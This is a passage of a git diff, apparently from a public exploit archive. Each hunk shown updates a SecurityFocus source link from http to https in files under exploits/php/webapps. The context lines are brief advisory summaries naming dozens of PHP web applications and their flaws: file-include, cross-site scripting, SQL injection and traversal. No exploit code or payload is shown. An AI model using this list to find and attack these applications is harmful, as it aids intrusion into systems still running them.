vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28778.txt b/exploits/php/webapps/28778.txt index 614d34039..c0e49dc45 100644 --- a/exploits/php/webapps/28778.txt +++ b/exploits/php/webapps/28778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20436/info +source: https://www.securityfocus.com/bid/20436/info IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28779.txt b/exploits/php/webapps/28779.txt index 99ba59280..19691de3a 100644 --- a/exploits/php/webapps/28779.txt +++ b/exploits/php/webapps/28779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20441/info +source: https://www.securityfocus.com/bid/20441/info Album Photo Sans Nom is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28780.txt b/exploits/php/webapps/28780.txt index d31944c44..c5f63002a 100644 --- a/exploits/php/webapps/28780.txt +++ b/exploits/php/webapps/28780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20442/info +source: https://www.securityfocus.com/bid/20442/info Softerra PHP Developer Library is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28781.txt b/exploits/php/webapps/28781.txt index 14f5feacd..6081ee4c9 100644 --- a/exploits/php/webapps/28781.txt +++ b/exploits/php/webapps/28781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20450/info +source: https://www.securityfocus.com/bid/20450/info BlueShoes Framework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28782.txt b/exploits/php/webapps/28782.txt index 9dfb6a160..19794845b 100644 --- a/exploits/php/webapps/28782.txt +++ b/exploits/php/webapps/28782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20451/info +source: https://www.securityfocus.com/bid/20451/info Tagit2b is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28783.txt b/exploits/php/webapps/28783.txt index c987823b3..25b76b54a 100644 --- a/exploits/php/webapps/28783.txt +++ b/exploits/php/webapps/28783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20460/info +source: https://www.securityfocus.com/bid/20460/info MySQLDumper is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28784.txt b/exploits/php/webapps/28784.txt index 4b5951927..93e11e3aa 100644 --- a/exploits/php/webapps/28784.txt +++ b/exploits/php/webapps/28784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20461/info +source: https://www.securityfocus.com/bid/20461/info gcards is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28786.pl b/exploits/php/webapps/28786.pl index 6fe8e2260..1e53ccc16 100755 --- a/exploits/php/webapps/28786.pl +++ b/exploits/php/webapps/28786.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20466/info +source: https://www.securityfocus.com/bid/20466/info CommunityPortals is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28787.txt b/exploits/php/webapps/28787.txt index 188a21ca6..9383e3e15 100644 --- a/exploits/php/webapps/28787.txt +++ b/exploits/php/webapps/28787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20468/info +source: https://www.securityfocus.com/bid/20468/info Dokeos is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28790.txt b/exploits/php/webapps/28790.txt index f58d0af5a..e66bfb4c5 100644 --- a/exploits/php/webapps/28790.txt +++ b/exploits/php/webapps/28790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20483/info +source: https://www.securityfocus.com/bid/20483/info phpList is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28791.txt b/exploits/php/webapps/28791.txt index 8349a4216..03dc02497 100644 --- a/exploits/php/webapps/28791.txt +++ b/exploits/php/webapps/28791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20486/info +source: https://www.securityfocus.com/bid/20486/info PHP TopSites is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28792.txt b/exploits/php/webapps/28792.txt index 697d679ab..aeca4620a 100644 --- a/exploits/php/webapps/28792.txt +++ b/exploits/php/webapps/28792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20487/info +source: https://www.securityfocus.com/bid/20487/info ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28793.txt b/exploits/php/webapps/28793.txt index e3205062b..8287a70a2 100644 --- a/exploits/php/webapps/28793.txt +++ b/exploits/php/webapps/28793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20487/info +source: https://www.securityfocus.com/bid/20487/info ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28794.txt b/exploits/php/webapps/28794.txt index 0302e8ec3..6aad85258 100644 --- a/exploits/php/webapps/28794.txt +++ b/exploits/php/webapps/28794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20488/info +source: https://www.securityfocus.com/bid/20488/info 4images is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28795.php b/exploits/php/webapps/28795.php index 0de03451a..9aeebe164 100644 --- a/exploits/php/webapps/28795.php +++ b/exploits/php/webapps/28795.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20494/info +source: https://www.securityfocus.com/bid/20494/info FreeWPS is prone to a remote command-execution vulnerability. diff --git a/exploits/php/webapps/28796.pl b/exploits/php/webapps/28796.pl index 2cbb18c19..3af4eec96 100755 --- a/exploits/php/webapps/28796.pl +++ b/exploits/php/webapps/28796.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20511/info +source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28797.txt b/exploits/php/webapps/28797.txt index b9ecbad58..a0d8a34df 100644 --- a/exploits/php/webapps/28797.txt +++ b/exploits/php/webapps/28797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28798.txt b/exploits/php/webapps/28798.txt index 846167114..cb991da1b 100644 --- a/exploits/php/webapps/28798.txt +++ b/exploits/php/webapps/28798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28799.txt b/exploits/php/webapps/28799.txt index 48c36b3c5..0f416fe79 100644 --- a/exploits/php/webapps/28799.txt +++ b/exploits/php/webapps/28799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28800.txt b/exploits/php/webapps/28800.txt index 58d781975..a7b3e965a 100644 --- a/exploits/php/webapps/28800.txt +++ b/exploits/php/webapps/28800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28801.txt b/exploits/php/webapps/28801.txt index 5341f57ad..eac9e72cd 100644 --- a/exploits/php/webapps/28801.txt +++ b/exploits/php/webapps/28801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28802.txt b/exploits/php/webapps/28802.txt index f2f7e2150..4d2dc713f 100644 --- a/exploits/php/webapps/28802.txt +++ b/exploits/php/webapps/28802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28803.txt b/exploits/php/webapps/28803.txt index 8f5b199b1..ef055d0b9 100644 --- a/exploits/php/webapps/28803.txt +++ b/exploits/php/webapps/28803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20514/info +source: https://www.securityfocus.com/bid/20514/info Xoops is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28804.pl b/exploits/php/webapps/28804.pl index 53c384b97..6ee97514d 100755 --- a/exploits/php/webapps/28804.pl +++ b/exploits/php/webapps/28804.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20516/info +source: https://www.securityfocus.com/bid/20516/info The Add Name component for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28814.txt b/exploits/php/webapps/28814.txt index 669a33d99..8772765c8 100644 --- a/exploits/php/webapps/28814.txt +++ b/exploits/php/webapps/28814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20523/info +source: https://www.securityfocus.com/bid/20523/info RamaCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28815.txt b/exploits/php/webapps/28815.txt index 228ada52c..b5e5a71a5 100644 --- a/exploits/php/webapps/28815.txt +++ b/exploits/php/webapps/28815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20532/info +source: https://www.securityfocus.com/bid/20532/info H-Sphere WebShell is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28818.txt b/exploits/php/webapps/28818.txt index 5970502b0..30a66e5e9 100644 --- a/exploits/php/webapps/28818.txt +++ b/exploits/php/webapps/28818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20549/info +source: https://www.securityfocus.com/bid/20549/info Mambo MostlyCE is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28819.txt b/exploits/php/webapps/28819.txt index 7e3d9087f..acbededd4 100644 --- a/exploits/php/webapps/28819.txt +++ b/exploits/php/webapps/28819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20551/info +source: https://www.securityfocus.com/bid/20551/info Lodel CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28820.txt b/exploits/php/webapps/28820.txt index 6a4d26ed5..890a5217a 100644 --- a/exploits/php/webapps/28820.txt +++ b/exploits/php/webapps/28820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20554/info +source: https://www.securityfocus.com/bid/20554/info GOOP Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28821.txt b/exploits/php/webapps/28821.txt index 391f7ea7b..fc1da8d17 100644 --- a/exploits/php/webapps/28821.txt +++ b/exploits/php/webapps/28821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20560/info +source: https://www.securityfocus.com/bid/20560/info Maintain is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28823.pl b/exploits/php/webapps/28823.pl index 4a94d2f08..8b84dbb47 100755 --- a/exploits/php/webapps/28823.pl +++ b/exploits/php/webapps/28823.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20564/info +source: https://www.securityfocus.com/bid/20564/info PowerMovieList is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28824.txt b/exploits/php/webapps/28824.txt index c326603e5..0589ae94d 100644 --- a/exploits/php/webapps/28824.txt +++ b/exploits/php/webapps/28824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20577/info +source: https://www.securityfocus.com/bid/20577/info PHPList is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28825.txt b/exploits/php/webapps/28825.txt index 39f58b862..ae449b649 100644 --- a/exploits/php/webapps/28825.txt +++ b/exploits/php/webapps/28825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20590/info +source: https://www.securityfocus.com/bid/20590/info DEV Web Manager System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28826.txt b/exploits/php/webapps/28826.txt index 559304ffa..866dbd8c8 100644 --- a/exploits/php/webapps/28826.txt +++ b/exploits/php/webapps/28826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20598/info +source: https://www.securityfocus.com/bid/20598/info Cerberus Helpdesk is prone to an unauthorized-access vulnerability because the application fails to authenticate users properly, resulting in an improper-access validation. A workaround is available. diff --git a/exploits/php/webapps/28827.txt b/exploits/php/webapps/28827.txt index b4fed6e42..6bf1dca0c 100644 --- a/exploits/php/webapps/28827.txt +++ b/exploits/php/webapps/28827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20603/info +source: https://www.securityfocus.com/bid/20603/info PHP Live Helper is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/28828.txt b/exploits/php/webapps/28828.txt index 27d703399..c5c7b279e 100644 --- a/exploits/php/webapps/28828.txt +++ b/exploits/php/webapps/28828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20606/info +source: https://www.securityfocus.com/bid/20606/info Zorum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28830.pl b/exploits/php/webapps/28830.pl index 663f2f3a1..2009f711f 100755 --- a/exploits/php/webapps/28830.pl +++ b/exploits/php/webapps/28830.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20621/info +source: https://www.securityfocus.com/bid/20621/info Free Faq is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28831.txt b/exploits/php/webapps/28831.txt index 54c3cb6bc..ebbb6384e 100644 --- a/exploits/php/webapps/28831.txt +++ b/exploits/php/webapps/28831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20629/info +source: https://www.securityfocus.com/bid/20629/info Simple Machines Forum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28832.txt b/exploits/php/webapps/28832.txt index ccc6b6f1e..276abce90 100644 --- a/exploits/php/webapps/28832.txt +++ b/exploits/php/webapps/28832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20634/info +source: https://www.securityfocus.com/bid/20634/info ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28833.pl b/exploits/php/webapps/28833.pl index 454b93ac8..b49a72ae7 100755 --- a/exploits/php/webapps/28833.pl +++ b/exploits/php/webapps/28833.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20646/info +source: https://www.securityfocus.com/bid/20646/info Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28838.txt b/exploits/php/webapps/28838.txt index e51735e71..8209253ab 100644 --- a/exploits/php/webapps/28838.txt +++ b/exploits/php/webapps/28838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20672/info +source: https://www.securityfocus.com/bid/20672/info ClanLite is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28839.txt b/exploits/php/webapps/28839.txt index dae7e0250..754893fab 100644 --- a/exploits/php/webapps/28839.txt +++ b/exploits/php/webapps/28839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20673/info +source: https://www.securityfocus.com/bid/20673/info SchoolAlumni portal is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include a local file-include vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28840.txt b/exploits/php/webapps/28840.txt index 6f26bab02..6f9b52266 100644 --- a/exploits/php/webapps/28840.txt +++ b/exploits/php/webapps/28840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20673/info +source: https://www.securityfocus.com/bid/20673/info SchoolAlumni portal is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include a local file-include vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28842.txt b/exploits/php/webapps/28842.txt index c119cc877..d5ca5be3c 100644 --- a/exploits/php/webapps/28842.txt +++ b/exploits/php/webapps/28842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20682/info +source: https://www.securityfocus.com/bid/20682/info Zwahlen's Online Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28843.txt b/exploits/php/webapps/28843.txt index 78a019679..d35cca8b9 100644 --- a/exploits/php/webapps/28843.txt +++ b/exploits/php/webapps/28843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20683/info +source: https://www.securityfocus.com/bid/20683/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28844.txt b/exploits/php/webapps/28844.txt index 80b399e9e..14f590ee2 100644 --- a/exploits/php/webapps/28844.txt +++ b/exploits/php/webapps/28844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20683/info +source: https://www.securityfocus.com/bid/20683/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28845.txt b/exploits/php/webapps/28845.txt index f49ef7eae..69a098d22 100644 --- a/exploits/php/webapps/28845.txt +++ b/exploits/php/webapps/28845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20685/info +source: https://www.securityfocus.com/bid/20685/info Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28846.html b/exploits/php/webapps/28846.html index 078ae6928..bf6f95266 100644 --- a/exploits/php/webapps/28846.html +++ b/exploits/php/webapps/28846.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20688/info +source: https://www.securityfocus.com/bid/20688/info WikiNi is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content. diff --git a/exploits/php/webapps/28851.txt b/exploits/php/webapps/28851.txt index bb2acc3fc..e0901f7dc 100644 --- a/exploits/php/webapps/28851.txt +++ b/exploits/php/webapps/28851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20711/info +source: https://www.securityfocus.com/bid/20711/info Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28858.txt b/exploits/php/webapps/28858.txt index 13600da9a..a1a051f37 100644 --- a/exploits/php/webapps/28858.txt +++ b/exploits/php/webapps/28858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20714/info +source: https://www.securityfocus.com/bid/20714/info SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28859.txt b/exploits/php/webapps/28859.txt index 7fdb10123..c35cfa9de 100644 --- a/exploits/php/webapps/28859.txt +++ b/exploits/php/webapps/28859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20714/info +source: https://www.securityfocus.com/bid/20714/info SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28861.txt b/exploits/php/webapps/28861.txt index fa2338791..b3c1b35d6 100644 --- a/exploits/php/webapps/28861.txt +++ b/exploits/php/webapps/28861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20739/info +source: https://www.securityfocus.com/bid/20739/info Comment IT is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28862.txt b/exploits/php/webapps/28862.txt index fd0fffb68..270701cc6 100644 --- a/exploits/php/webapps/28862.txt +++ b/exploits/php/webapps/28862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20741/info +source: https://www.securityfocus.com/bid/20741/info phpMyConference is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28864.txt b/exploits/php/webapps/28864.txt index 555ea2c12..24f9ba983 100644 --- a/exploits/php/webapps/28864.txt +++ b/exploits/php/webapps/28864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20756/info +source: https://www.securityfocus.com/bid/20756/info Php League is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28865.txt b/exploits/php/webapps/28865.txt index edd4ca4d4..f2faff091 100644 --- a/exploits/php/webapps/28865.txt +++ b/exploits/php/webapps/28865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20764/info +source: https://www.securityfocus.com/bid/20764/info PHPTreeview is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28866.txt b/exploits/php/webapps/28866.txt index ab181792a..9ae3af74f 100644 --- a/exploits/php/webapps/28866.txt +++ b/exploits/php/webapps/28866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20768/info +source: https://www.securityfocus.com/bid/20768/info iG Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28867.txt b/exploits/php/webapps/28867.txt index 7e8713ad5..1c89fd810 100644 --- a/exploits/php/webapps/28867.txt +++ b/exploits/php/webapps/28867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20771/info +source: https://www.securityfocus.com/bid/20771/info TorrentFlux is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28868.txt b/exploits/php/webapps/28868.txt index 7ef477b60..36d5d2594 100644 --- a/exploits/php/webapps/28868.txt +++ b/exploits/php/webapps/28868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20772/info +source: https://www.securityfocus.com/bid/20772/info PLS-Bannieres is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28870.txt b/exploits/php/webapps/28870.txt index 305ed9db2..3f17503cf 100644 --- a/exploits/php/webapps/28870.txt +++ b/exploits/php/webapps/28870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20786/info +source: https://www.securityfocus.com/bid/20786/info PunBB is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28871.txt b/exploits/php/webapps/28871.txt index 39dc18cbd..66da064ca 100644 --- a/exploits/php/webapps/28871.txt +++ b/exploits/php/webapps/28871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20788/info +source: https://www.securityfocus.com/bid/20788/info Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28872.txt b/exploits/php/webapps/28872.txt index f41a550e8..4aeabefb4 100644 --- a/exploits/php/webapps/28872.txt +++ b/exploits/php/webapps/28872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20788/info +source: https://www.securityfocus.com/bid/20788/info Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28873.txt b/exploits/php/webapps/28873.txt index 9dcdbedf2..bd26b723e 100644 --- a/exploits/php/webapps/28873.txt +++ b/exploits/php/webapps/28873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20793/info +source: https://www.securityfocus.com/bid/20793/info Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28874.txt b/exploits/php/webapps/28874.txt index 874113cab..73e181565 100644 --- a/exploits/php/webapps/28874.txt +++ b/exploits/php/webapps/28874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20793/info +source: https://www.securityfocus.com/bid/20793/info Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28875.txt b/exploits/php/webapps/28875.txt index 04e69c737..676ffc3d5 100644 --- a/exploits/php/webapps/28875.txt +++ b/exploits/php/webapps/28875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20795/info +source: https://www.securityfocus.com/bid/20795/info Freenews is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28881.txt b/exploits/php/webapps/28881.txt index 10abd760a..f34fd9595 100644 --- a/exploits/php/webapps/28881.txt +++ b/exploits/php/webapps/28881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20818/info +source: https://www.securityfocus.com/bid/20818/info ForeSite CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28882.txt b/exploits/php/webapps/28882.txt index 6704594aa..1507d4ef5 100644 --- a/exploits/php/webapps/28882.txt +++ b/exploits/php/webapps/28882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20821/info +source: https://www.securityfocus.com/bid/20821/info phpFaber CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28883.txt b/exploits/php/webapps/28883.txt index fd432fe50..2a0d2fa98 100644 --- a/exploits/php/webapps/28883.txt +++ b/exploits/php/webapps/28883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20825/info +source: https://www.securityfocus.com/bid/20825/info Easy Web Portal is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28885.php b/exploits/php/webapps/28885.php index 3cd4698ae..7967f4776 100644 --- a/exploits/php/webapps/28885.php +++ b/exploits/php/webapps/28885.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20829/info +source: https://www.securityfocus.com/bid/20829/info The PHP-Nuke Journal module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28886.txt b/exploits/php/webapps/28886.txt index 4e7814a5b..29921cd38 100644 --- a/exploits/php/webapps/28886.txt +++ b/exploits/php/webapps/28886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20831/info +source: https://www.securityfocus.com/bid/20831/info The Search Engine Project is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28889.txt b/exploits/php/webapps/28889.txt index 3a006092c..cb211078e 100644 --- a/exploits/php/webapps/28889.txt +++ b/exploits/php/webapps/28889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20837/info +source: https://www.securityfocus.com/bid/20837/info Netquery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28890.txt b/exploits/php/webapps/28890.txt index 1088e220d..116713a6c 100644 --- a/exploits/php/webapps/28890.txt +++ b/exploits/php/webapps/28890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20838/info +source: https://www.securityfocus.com/bid/20838/info iPlanet Messaging Server Messenger Express is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28891.txt b/exploits/php/webapps/28891.txt index f4b1fefaa..2d02249e1 100644 --- a/exploits/php/webapps/28891.txt +++ b/exploits/php/webapps/28891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20840/info +source: https://www.securityfocus.com/bid/20840/info Mirapoint Web Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28892.txt b/exploits/php/webapps/28892.txt index c099b3704..3cb6b1239 100644 --- a/exploits/php/webapps/28892.txt +++ b/exploits/php/webapps/28892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20849/info +source: https://www.securityfocus.com/bid/20849/info RSSonate is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28893.pl b/exploits/php/webapps/28893.pl index da691ccbc..ac985ea3f 100755 --- a/exploits/php/webapps/28893.pl +++ b/exploits/php/webapps/28893.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20857/info +source: https://www.securityfocus.com/bid/20857/info KnowledgeBuilder is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28896.txt b/exploits/php/webapps/28896.txt index 27eeb8129..40b477cbf 100644 --- a/exploits/php/webapps/28896.txt +++ b/exploits/php/webapps/28896.txt @@ 